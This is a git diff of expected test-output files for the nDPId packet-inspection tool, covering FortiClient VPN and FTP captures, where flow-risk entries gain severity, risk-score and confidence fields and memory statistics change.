{"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"40adfd923eb82b89d8836ba37a19bca1","ja3s":"e35df3e00ca4ef31d42b34bebaa2f86e","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
+00944{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1621067203571,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3422,"flow_avg_l4_payload_len":162,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
+00952{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1621067204622,"flow_last_seen":1621067205708,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6751,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
+00952{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1621067205651,"flow_last_seen":1621067206738,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3853,"flow_avg_l4_payload_len":160,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
+00952{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1621067206773,"flow_last_seen":1621067207860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7276,"flow_avg_l4_payload_len":250,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
+00957{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1901,"flow_first_seen":1621067209199,"flow_last_seen":1621067222261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":277457,"flow_avg_l4_payload_len":145,"midstream":0,"ts_msec":1621067222261,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61820,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"}}
 00162{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2000,"source":"forticlient.pcap","alias":"nDPId-test","total-events-serialized":42}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2000/2000
@@ -48,10 +48,10 @@
 ~~ total active/idle flows...: 5/5
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4688702 bytes
-~~ total memory freed........: 4688702 bytes
-~~ total allocations/frees...: 101588/101588
+~~ total memory allocated....: 4772343 bytes
+~~ total memory freed........: 4772343 bytes
+~~ total allocations/frees...: 103178/103178
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 167 chars
-~~ json string max len.......: 1275 chars
-~~ json string avg len.......: 790 chars
+~~ json string max len.......: 1472 chars
+~~ json string avg len.......: 889 chars
diff --git a/test/results/ftp-start-tls.pcap.out b/test/results/ftp-start-tls.pcap.out
index c428ca962..19954dd7c 100644
--- a/test/results/ftp-start-tls.pcap.out
+++ b/test/results/ftp-start-tls.pcap.out
@@ -3,8 +3,8 @@
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFOAAs3ocAAP8GetIK7hokCtwyTPKMABUzQlCKAAAAAGACIACjMgAAAgQCAAAA"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD8G378K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383123629078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"ts_msec":1383123629078,"pkt":"AAAAEAAU3NL8+wOhCABFAAAs+dJAAD0G4b8K3DJMCu4aJAAV8owdfc81M0JQi2ASwAASugAAAgQFtAAA"}
-00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
-00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
+00809{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1383123629078,"flow_last_seen":1383123629098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1383123629098,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
+00801{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":51,"flow_first_seen":1383123629078,"flow_last_seen":1383123629412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":4690,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1383123629412,"l3_proto":"ip4","src_ip":"10.238.26.36","dst_ip":"10.220.50.76","src_port":62092,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
 00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":51,"source":"ftp-start-tls.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 51/51
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4598356 bytes
-~~ total memory freed........: 4598356 bytes
-~~ total allocations/frees...: 99605/99605
+~~ total memory allocated....: 4683309 bytes
+~~ total memory freed........: 4683309 bytes
+~~ total allocations/frees...: 101195/101195
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
-~~ json string max len.......: 707 chars
-~~ json string avg len.......: 496 chars
+~~ json string max len.......: 814 chars
+~~ json string avg len.......: 543 chars
diff --git a/test/results/ftp.pcap.out b/test/results/ftp.pcap.out
index 06ae9a2b7..bd5db3901 100644
--- a/test/results/ftp.pcap.out
+++ b/test/results/ftp.pcap.out
@@ -3,20 +3,20 @@
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"}
-00707{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}}
+00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="}
 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"}
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"}
 00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00633{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
-00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
-00710{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
+00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}}
+00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","total-events-serialized":20}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 1192/1192
@@ -26,10 +26,10 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4637941 bytes
-~~ total memory freed........: 4637941 bytes
-~~ total allocations/frees...: 100754/100754
+~~ total memory allocated....: 4722238 bytes
+~~ total memory freed........: 4722238 bytes
+~~ total allocations/frees...: 102344/102344
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 715 chars
-~~ json string avg len.......: 506 chars
+~~ json string max len.......: 824 chars
+~~ json string avg len.......: 560 chars
diff --git a/test/results/ftp_failed.pcap.out b/test/results/ftp_failed.pcap.out
index a7e88caed..824b5699f 100644
--- a/test/results/ftp_failed.pcap.out
+++ b/test/results/ftp_failed.pcap.out
@@ -3,7 +3,7 @@
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="}
